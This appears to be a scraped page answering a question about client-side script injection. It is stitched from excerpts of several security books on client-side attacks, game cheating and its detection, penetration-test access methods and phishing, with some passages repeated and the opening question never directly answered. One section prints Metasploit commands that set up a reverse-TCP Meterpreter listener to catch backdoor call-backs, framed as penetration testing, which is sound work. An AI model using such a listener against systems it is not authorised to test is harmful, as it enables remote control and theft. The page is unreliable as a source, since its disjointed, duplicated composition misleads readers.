What type of attack involves the hacker inserting a client side script into the web page?

Client-Side Attacks

Client-side attacks occur when a user downloads malicious content. The flow of data is reversed compared to server-side attacks: client-side attacks initiate from the victim who downloads content from the attacker.

Client-side attacks are difficult to mitigate for organizations that allow Internet access. Clients include word processing software, spreadsheets, media players, Web browsers, etc. Most firewalls are far more restrictive inbound compared to outbound; they were designed to “keep the bad guys out,” and mitigate server-side attacks originating from untrusted networks. They often fail to prevent client-side attacks.

Client-Side Attacks

Client-side attacks occur when a user downloads malicious content. The flow of data is reversed compared to server-side attacks: client-side attacks initiate from the victim who downloads content from the attacker, as shown in Figure 4.16.

Client-side attacks are difficult to mitigate for organizations that allow Internet access. Clients include word processing software, spreadsheets, media players, Web browsers, etc. Browsers such as Internet Explorer and Firefox are actually a collection of software: the browser itself, plus third-party software such as Adobe Acrobat Reader, Adobe Flash, iTunes, QuickTime, RealPlayer, etc. All are potentially vulnerable to client-side attacks. All client-side software must be patched, a challenge many organizations struggle with.

Most firewalls are far more restrictive inbound compared to outbound: they were designed to “keep the bad guys out,” and mitigate server-side attacks originating from untrusted networks. They often fail to prevent client-side attacks.

13.1.1 Client-side attacks

Client-side attacks are changes to the client software to effect some advantage for the player. What can be achieved here depends critically on what the client software is responsible for.

In a peer-to-peer NVE, the client is usually responsible for calculating the results of its own actions. If the client can be hacked, then basically anything is possible. The client could give itself more resources, present diagnostic information about the status of the system or so on. Essentially any information that the client has to calculate its own state is available to be inspected and altered. As Koster puts it, “The client is in the hands of the enemy” (Koster, 2009). In general client-side hacks have been around almost as long as games. There are various pieces of software, often called trainers, which allow judicious edits to be made to game client software to gain an advantage. Originally these were designed to make single-player games easier, often by enabling more lives or a longer time limit. Indeed games companies were often complicit in publishing such codes, and games magazines used to, and occasionally still do, print out instructions for using these trainers on specific games. Their use for single-player games is fairly benign, but for NGs it can be a serious problem.

One infamous example is the Warcraft III™ Maphack (Chambers, et al., 2005). Warcraft III™ is a real-time strategy game using an isometric view and an overview map. As part of the gameplay, the player should only be visually aware of the world around them out to a certain distance. The idea is that most of the world is undiscovered, and the other players are hidden from each other. However, being a peer-to-peer game, each client must actually have the state of the other players as this state might influence the results of their actions. Thus the normal game is effectively hiding information that it holds from the player. The maphack turns off this hiding so that all activity is revealed and the player using the maphack has a significant advantage.

With client/server systems such straightforward backs aren’t so feasible. The server holds the important data and can send the client data on a need-to-know basis. Unfortunately even though the data might be restricted, the system is still open to several types of attack.

One example attack is again related to the issue of visibility of objects. The Quake server uses a PVS to filter entities that a client is not able to see (Kirsch, D., cited in Capps & Teller, 1997). However, a PVS is a cell-to-cell visibility data structure and thus it is conservative from any particular viewpoint. This means that the server sends the positions of a few entities that the player can’t yet see. If the client makes the walls of the world invisible, it can probably see clients coming around corners before it should be able to.

A second type of attack is to augment the player’s skill. The client software only sends control input, but a client can make sure that the control input is the “best” input that there could possibly be. For example, it could always correct the aim of a user to hit the target on screen. It could even fire for them when it was appropriate to do this. These types of assist are commonly known as aimbots. Another variant is to provide complex behaviors automatically. An example would be in an MMOG where the actions to complete a task would essentially be automated. Automatically controlled entities are generally called bots. One very capable such bot is the Glider® software from MDY Industries, LLC (MMOGlider, 2009) which can automate and complete tasks in World of Warcraft™. Obviously such software is highly controversial, both with developers and other users.

There are many more types of attack, but these examples are the main vectors of attach: subverting the display of information and subverting the control input. Detecting these types of attack is difficult. Two main approaches are used: verification of the client and behavior tracking.

Client verification is a process of making sure that the client code has not been altered. This can be done simply by examining memory and disk to verify the application code and data, and also detect any known hostile programs on the machine. This type of verification is now quite common on games for PC, with Punkbuster™ from Even Balance Inc. being an example. The use of such programs is controversial because such processes could scan sensitive information in other programs. Client verification is not so much of an issue on console games because the games are signed and the console hardware can authenticate them.

Behavior tracking looks for characteristic patterns in user or entity traffic. A naïve use of any of the techniques above would be easily detectable: no real player’s reaction time is that good, and no-one’s aim is perfect; bots tend to do repetitive, monotonously timed actions, whereas real players vary their performance.

Behavior tracking can easily be done on a server in a client/server system. A server can, of course, trivially reject any messages that are impossible for the player. Thus certain behaviors (e.g. instantaneous aiming implying a reaction time of 0 ms) can be detected easily. Otherwise behavior needs to be recorded and analyzed. Chen, et al. (2006) detect bots in the game Ragnarok Online™ by observing the client message traffic. They observe that bots tend to release packets in regular intervals and that they don’t adapt, as do real players, to network congestion. In Chen et al. (2009), bots are detected based on their trajectories. The authors note that although bots try to simulate human traffic, certain features of their traffic, such as movement rate and turns, can be used to create detectors if behavior can be tracked for a long enough period. They state that they can detect popular bots for the game Quake II at 95% accuracy given a behavior log of 200 seconds or longer. Yeung et al. (2006) propose a system to detect aimbots in first-person shooters based on statistical observation of game state changes. Kim et al. (2005) and Thawonmas et al. (2008) also use statistical tests to detect bots in MMOG by noting the frequency and patterns of actions.

In a peer-to-peer system where there is no central server that can observe cause and effect, peers can audit one another to make sure that no one is inserting impossible events. Goodman & Verbrugge (2008) propose such as scheme.

A specific type of behavior that supports a range of attacks is a lookahead cheat (Baughman & Levine, 2001) where a client’s response is purposefully delayed. This has various guises, but at its simplest, a client lies about its network delays and thus receives updates from other players in plenty of time to respond. This is strongly related to the issues of bucket synchronization and playout delays discussed in Chapter 11. For the specific case of lockstep simulation games, Baughman & Levine show that cheating can be prevented by having the parties exchange a secure hash of their proposed moves before revealing their actual moves. This is appropriate for many games, but lockstep protocols aren’t sufficient for continuous actions. Cronin et al. (2003) show how to detect cheating in dead-reckoning protocols. GauthierDickey et al. (2004) extend four types of protocol for NVEs to prevent cheating while retaining overall low latency.

Certain types of graphics hacks are very hard to prevent other than by client authentication. The reason for this is that they simply change the way the graphics card renders the image, and thus the graphics card itself can be compromised with altered drivers. As an extreme example, the Chromium system allows the graphics command stream to be intercepted and the whole look of the graphics to be changed (Humphreys et al., 2002). One of Chromium’s example applications is taking Quake III and converting the renderings from their default appearance to pen and ink-style rendering.

Because of the importance of NVEs and NGs, this area is expanding rapidly, partly because as one type of cheat is prevented, another springs up.

Access

Gaining access to a system can take place using a variety of tools and methods. If we have been successful in any of our previous attempts at social engineering, dumpster diving, stealing or cloning access card, such as Common Access Cards (CACs) or have managed to find accounts with synchronized passwords on other systems that we have been able to access, we may very well have legitimate credentials with which we can simply log in. Slightly more complicated than this, although more likely, is that we will be able to find usernames that exist on the system and either crack or guess passwords, using some of the tools that we discussed in Chapter 5, in order to access them.

Another potential path that may gain us easy access would be to use client side attacks against individual systems that belong to the users of our target system. Such attacks utilize vulnerabilities in software running on the client, such as a web browser, as an attack vector. We stand a much greater chance of being able to access individual workstations in order to gain access to credentials than we do when attempting to do access a server that is carefully maintained and patched. Client side attacks can be web-based, use email as a delivery method, ride in on a USB drive, or any of a number of other methods. Particularly in non-technical working environments, such attacks enjoy a high degree of success, although we may not find as much success in highly secured environments.

Tip

Client side attacks are often some of the most effective attacks that we can carry out. Such attacks, when combined with a certain element of social engineering, as we discussed in Chapter 7, are very difficult to defend against. When we use human carelessness or ignorance as an attack vector, we will often enjoy success.

We can also attempt to use common operating system or application exploits in order to access a system. We have likely, at some point in the process, already used one or more of a variety of vulnerability scanning tools, either during the more general reconnaissance process, or during the more specific examination during the attack process.

Note

In the case of a true cyber attack, we will likely not be using exploits that are available to the general public. Such attacks are likely to already be patched or mitigated in some fashion, and easily rebuffed. Instead, we will be using zero day exploits which stand a much greater chance of success, due to not being commonly known.

Many common vulnerability analysis tools, such as Nessus, which we discussed in Chapter 5, can be used to locate vulnerabilities that we might use to access a system. Although it is unlikely that we will gain access in such a fashion on a fully patched system running a recent operating system, there are plenty of systems that are likely not in such a well-maintained state to which we may easily be able to gain access. It is also important to test our attacks in an environment as close as possible to the actual target as we can create. This will allow us to not only test our exploits, but to also help develop contingency plans to potentially compensate for issues that we might encounter when attacking.

Social Engineering

This client-side attack is becoming more common with almost every person who has an email address and getting an email. At some point that could lead to a phishing attack. In this type of attack the trust in a web site is used to fraudulently obtain confidential data, such as login or account credentials and bank account information. These attacks are successful due to the fact that the user is presented with a fraudulent, but highly authentic looking web site, usually via SPAM, which appears to originate from a trusted entity, such as a bank. The web site that the user is sent to however is under the control of a malicious party and when the user provides information to the web site such as personal information, the attacker will have obtained this confidential information. Sometimes you may be directed right to the malicious site, otherwise you may be redirected to a malicious site via a script.

Note

A variation of a phishing attack that is quite successful in acquiring information from end users who lack the knowledge to detect them are known as spear phishing attacks. Spear phishing attacks take place when specific individuals are targeted with the intention of gathering information from them that only they may possess; this is in opposition to normal phishing which emails out the message en masse.

An additional form of phishing goes by the term whaling which refers to the practice of targeting phishing emails towards executives or higher-ups in a company.

In both cases the victims are not chosen wholly at random rather they are chosen based on the fact that the information they have may be of greater value than others.

Summary

In this chapter client-side attacks were discussed in more depth with attacks such as cross-site scripting (XXS). As we observed client-side attacks can extract information or compromise the client in some way whether it is pulling information out of cookie or taking information from a system and using it to target other users. We also saw that with common client-side attacks, defenses are less than effective and may in fact be non-existent making it crucial that we are security professionals take heed and do what we can to educate users, properly security systems, know how to analyze and mitigate attacks and ultimately protect against them if we cannot stop them from happening in the first place.

Summary

To secure from client-side attacks you need to be vigilant and practice security in every process of deployment—with application development, with the infrastructure and the desktop environment or mobile devices that will be used. In sum, this book took a close look at the client-side attacks and the defense posture needed to thwart or mitigate such attacks.

In this chapter we covered how to secure applications from the perspective of development and how to lock down the infrastructure that the applications run on. It then looked at the securing of the desktop client by patching it and preparing it by closing all available holes an attacker may look in.

As security professionals we must always consider that our systems are vulnerable. They are living devices that are always in flux of change, things added to them and new code, software and applications are always developed and used. They use more and more and additional functionality is added. As they seem living, so does the security in which we need to apply to them. We must always stay ahead of the curve and think of every potential issue that may occur. We must educate those who use the systems and applications so that we can better defend them. Client-side attacks are prevalent, but so is the movement to secure against them. Continue the charge and hopefully we can all stay one step ahead of the next attack. Until then…

Set Up a Metasploit Listener

The backdoors and Trojan horse that were created are client-side attacks and call home for further instructions. The penetration tester will need to set up a listener in Metasploit to answer the call. The multi-handler within Metasploit is a glorified answering service for a Trojan or backdoor to call home and receive further instructions.

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST {YOUR_IP}

set LPORT {PORT}

run

Figure 10.5 shows the setup of a listener on Metasploit and a call back from a backdoor. The connection was made from the victim’s operating system with the unencoded-payload.exe application was executed.

Access

Gaining access to a system can take place using a variety of tools and methods. If we have been successful in any of our previous attempts at social engineering, dumpster diving, stealing, or cloning access cards, such as Common Access Cards (CACs) mandated by Homeland Security Presidential Directive 12: Policy for a Common Identification Standard for Federal Employees and Contractors or have managed to find accounts with synchronized passwords on other systems that we have been able to access, we may very well have legitimate credentials with which we can simply log in. Slightly more complicated than this, although more likely, is that we will be able to find usernames that exist on the system and either crack or guess passwords, using some of the tools that we discussed in Chapter 6, in order to access them.

Another potential path that may gain us easy access would be to use client-side attacks against individual systems that belong to the users of our target system. Such attacks utilize vulnerabilities in software running on the client, such as a web browser, as an attack vector. We stand a much greater chance of being able to access individual workstations in order to gain access to credentials than we do when attempting to access a server that is carefully maintained and patched. Client-side attacks can be web-based, use email as a delivery method, ride in on a USB drive, or any of a number of other methods. One example of this that is commonly known today is the 2008 cyber attack on U.S. military computers in history named “Operation Buckshot Yankee.” The case involves USB flash drives infected by a foreign intelligence agency and prompted the military to ban the use of them [2]. Particularly in nontechnical working environments, such attacks enjoy a high degree of success, although we may not find as much success in highly secured environments.

Tip

Client-side attacks are often some of the most effective attacks that we can carry out. Such attacks, when combined with a certain element of social engineering, as we discussed in Chapter 8, are very difficult to defend against. When we use human carelessness or ignorance as an attack vector, we will often enjoy success.

We can also attempt to use common operating system or application exploits in order to access a system. We have likely, at some point in the process, already used one or more of a variety of vulnerability scanning tools, either during the more general reconnaissance process, or during the more specific examination during the attack process.

Note

In the case of a cyber attack, we will likely not use exploits that are available to the general public. Such vulnerabilities are likely to already be patched or mitigated in some fashion, and easily rebuffed. Instead, we will use zero-day exploits which stand a much greater chance of success, due to not being commonly known.

Many common vulnerability analysis tools, such as Nessus, which we discussed in Chapter 6, can be used to locate vulnerabilities that we might use to access a system. Although it is unlikely that we will gain access in such a fashion on a fully patched system running a recent operating system, there are plenty of systems that are likely not in such a well-maintained state to which we may easily be able to gain access. It is also important to test our attacks in an environment as close as possible to the actual target as we can create. This will allow us to not only test our exploits, but to also help develop contingency plans to potentially compensate for issues that we might encounter when attacking.